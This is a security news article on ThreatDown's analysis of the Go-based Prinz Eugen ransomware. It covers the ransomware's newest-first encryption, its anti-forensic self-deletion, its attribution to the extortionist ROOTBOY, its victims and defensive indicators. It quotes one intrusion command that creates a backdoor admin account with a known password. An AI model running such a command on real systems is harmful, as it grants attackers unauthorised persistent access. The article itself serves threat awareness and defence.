New Go ransomware Prinz Eugen hits newest files first

ThreatDown has published research on a new Go-based ransomware family called Prinz Eugen. It linked the malware to a known extortionist through a password string found in the attack chain.

The analysis describes malware that encrypts files, targets recently modified data first and removes traces of its activity after execution. Observed in a customer environment, it was built to confirm files were locked before the originals were deleted.

How it works

According to the research, the ransomware is delivered as an executable called servertool.exe and appears to have been deployed after attackers gained access through compromised Remote Desktop Protocol credentials. In the case examined, the program was downloaded through Chrome, moved into the user's Music folder and then launched against selected directories.

Written in Go, the malware uses recursive encryption across folders without a depth limit. The sample analysed did not include configured exclusions, meaning it would encrypt every file that did not already use the .prinzeugen extension and was not a temporary working file.

A notable feature is the order in which it processes data. Rather than scanning files alphabetically, Prinz Eugen encrypts the most recently modified files first. That can include active databases, current documents and fresh email archives that may not yet have recent backups.

This approach increases pressure on victims by hitting the newest and often most operationally important data first. The ransomware falls back to alphabetical sorting only when files share the same modification time.

The report also says the malware uses multiple worker routines, one per CPU, to process encryption in parallel. For each file, it creates an encrypted temporary copy, renames it to its final encrypted form and, if launched with a delete option, verifies that the encrypted version can be decrypted before erasing the original.

Researchers described this verification step as central to a scorched-earth design. The malware checks that the target file is fully locked and recoverable only through decryption before it removes the source copy.

No ransom note

Unlike many ransomware families, Prinz Eugen does not place a ransom note on the victim's system. The sample contained no code to write a text file, HTML page or similar demand to disk.

Instead, extortion appears to take place through direct email, phone contact and hidden online portals. Researchers said that approach reduces artefacts on compromised machines and makes the extortion stage harder to detect automatically.

Before exiting, the binary also attempts to frustrate investigators. It zeroes the hardcoded encryption key in memory, triggers garbage collection and then deletes itself using a command shell routine designed to wait briefly before removing the executable from disk.

Attribution trail

The strongest attribution clue came from a backdoor account created during the intrusion. ThreatDown observed the command net user admin germania /add and said the password string matched an extortion alias previously used by a dark-web actor known as ROOTBOY.

Researchers said that link ties the malware to an established data seller and extortionist whose activity predates Prinz Eugen. Public reporting and leak-site tracking cited in the research also associate ROOTBOY with the campaign linked to the malware.

The report says the same actor history includes earlier posts under the handle avtokz and references to GERMANIA in prior extortion attempts. ThreatDown argued that the reuse of naming conventions and identifiers provides the clearest public link between the ransomware sample and a known operator.

There are still caveats around attribution. ThreatDown noted that leak-site tracking has described ROOTBOY as an affiliate, which may suggest more than one person was involved, while the custom Go encryptor may also point to a separate developer.

Victims and infrastructure

The research links Prinz Eugen to attacks across several countries and sectors, with no single industry focus. The earliest public report cited in the analysis involved a leak portal used to extort Standard Bank Group in South Africa, while another named victim was Transitions Pro Centre Val de Loire in France.

ThreatDown said the broader model appears to combine data theft, encryption and direct pressure through leak sites and personal contact. In the Standard Bank case cited in the report, the attackers were said to have spent about three weeks inside the environment before exfiltrating data and escalating leaks after a payment demand was refused.

In the customer environment ThreatDown investigated, the attackers also used the RemotePC remote management tool to launch PowerShell stagers and deploy more payloads from an external IP address that was online at the time. ThreatDown suspects that host was being used as command-and-control infrastructure and that the additional payloads were likely remote access trojans used for information theft and exfiltration.

DNS and scanning history reviewed by the researchers showed a small cluster of associated domains, including a Standard Bank typosquat and domains containing the German word Festung. The operators appeared to dismantle parts of that infrastructure after operations, removing DNS records and stripping services from the exposed host.

Defensive signs

The research also outlined behaviour defenders can monitor, including the creation of an admin account with the germania password, use of RemotePC to run PowerShell, the .prinzeugen file extension, the CHV1 file header and the self-delete command used to erase the ransomware binary.

ThreatDown said its endpoint protection blocked the ransomware execution and its detection tools flagged both the suspicious account creation and the abuse of RemotePC for PowerShell staging. It identified the malware as Malware.Ransom.Agent.Generic.

"The core technical finding remains the same: Prinz Eugen is a new Go-based encryptor with deliberate file-targeting and anti-forensic behavior," the researchers said.